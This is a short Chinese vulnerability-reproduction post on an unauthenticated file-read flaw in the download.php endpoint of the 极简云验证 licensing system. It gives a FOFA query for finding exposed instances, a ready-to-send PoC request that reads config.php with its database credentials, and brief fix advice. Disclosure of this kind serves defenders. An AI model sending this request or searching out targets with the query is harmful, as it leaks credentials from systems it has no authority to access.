本文主要是介绍极简云验证 download.php 文件读取漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等
0x02 漏洞概述
极简云验证 download.php 接口处存在文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,数据库账号密码等敏感信息,使系统处于极不安全的状态。
0x03 复现环境
FOFA: "../assets/img/bg/logo_white.png"
0x04 漏洞复现
PoC
GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
这篇关于极简云验证 download.php 文件读取漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
